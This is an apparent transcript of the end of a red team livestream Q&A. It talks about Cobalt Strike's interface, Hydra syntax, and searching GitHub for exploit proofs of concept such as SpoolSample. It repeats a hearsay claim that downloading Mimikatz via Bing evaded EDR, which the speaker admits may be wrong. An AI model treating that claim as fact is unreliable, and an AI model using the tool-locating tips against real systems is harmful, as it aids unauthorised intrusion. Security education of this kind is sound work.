bringing us What Is Life's. Thank you so much. Welcome to the All Has Red Team What Is Life's. I kind of like Starkiller. Yeah, that's one thing Cobalt Strike is definitely behind on. We're still using that shitty Java fucking front end, that shitty Java client to access Cobalt Strike. I don't know why we can't just make a... Who owns Cobalt Strike now? I don't know why they can't just make a nice, slick web GUI like everyone else, all the other ones have. Like all the other ones have now. We're still... but I promise you, Cobalt Strike might look old, but I promise you that its capabilities are not old. Like it's like they've definitely spent their dev time in the right locations because Cobalt Strike is very robust. Mudge bailed. Yeah, I think Mudge sold Cobalt Strike to help systems, but it's still really good. Does Cobalt Strike have a nice terminal interface? I mean, it's just that Java. You can't access it through the terminal. You might be able to work out a terminal client for it, but it's meant to be accessed through that Java client. Is it bad to use Google while hacking? Absolutely not. Your most important hacking tool is Google. Absolutely, your most important hacking tool is Google. No one in real life is going to look down on you for Googling something really fast to make sure you get a command correct, or to look or anything you could be Googling. We use Google hundreds of thousands of times a stream on this very stream. Oh yeah, the most important red team tool is Bing. We learned that on Twitter today. I Google syntax every time I need to use Hydra. Hydra is a really obtuse syntax, especially if you're doing HTTP post. But yeah, there's stuff I have to Google every single time because I don't remember. Why Bing? I don't understand. I only glanced over it. I just saw that was the discourse on Twitter today. I think some adversary was able to bypass EDR by using Bing instead of Google to download tools or something. Someone in chat can feel free to correct me on that, but I'm pretty sure that somebody used Bing instead of Google to download like Mimikatz and stuff onto their host. And it was not caught by EDR because Bing instead of Google. Have you heard of some EDR will monitor your Google searches, by the way, to see if you're searching for like Mimikatz or definite malicious stuff. What about DuckDuckGo? I mean, I don't know. I think that's the story. Someone else can correct me if I'm wrong. I usually just feel like imposter syndrome if I ever need help from Google. Dude, I need help from Google every single fucking day. If I had to code something without Google, I think I'd probably puke. I have to use Google 50,000 times. If I try to write 10 lines of code, I'm gonna have to use Google 50 times. Like it's to make sure I get it right. Didn't the Lapsus dudes post the Bing source code also? Yeah, that's another thing. The Lapsus guys did compromise Microsoft and leaked a bunch of source code for Bing and Cortana and stuff. How did you survive in the skiff? I didn't enjoy it, I'll tell you that. Yeah, half of, like, I would say even more of the job of pen testing is not like retaining knowledge. It's not knowing how to type, knowing every option for every command that you ever type. It's knowing how to acquire knowledge very quickly. Like, for example, I'll give you a quick example. So when I had to find spool sample, I didn't remember what spool sample's name was. I just typed printer bug. GitHub. And I was able to find it immediately. Like, I just knew it was a GitHub page, but I didn't know what it was called. But I knew it was exploiting something that we call the printer bug. So I just searched printer bug GitHub. And you can do that with a lot of exploits. Like, with a new exploit that comes out, just search for the name of the exploit in GitHub, and you'll probably get a whole bunch of proofs of concept that people have written over the years. Like, it's little things like that that make a true pen tester. Being able to Google stuff efficiently is half the job. At least half the job. Being able to efficiently find information is because you can't possibly retain all this information. All right, it looks like Tiberius is streaming now, so we'll go ahead and give him a raid. All right, so if you have more questions, feel free to reach out to me on Discord. Don't worry, what's Star's favorite fancy feast? Anything with fish in it. Fish or chicken. So make sure to bring Tiberius glad tidings of Dread Cthulhu. We'll be back on Thursday with Cthulhu Thursday doing napping from Try Hack Me, I believe. And, yeah. Thanks for being here tonight. As always, good to have you all. It's the light of my life to be here and teach you guys the dark magics of hacking. Go to bed tonight. No, oh, God. Whew. Go to bed tonight knowing a little bit more than you did yesterday. I'll see you guys again when the stars are right. Have a good night, day, or whatever time it is wherever you are. Get vaccinated and stay safe.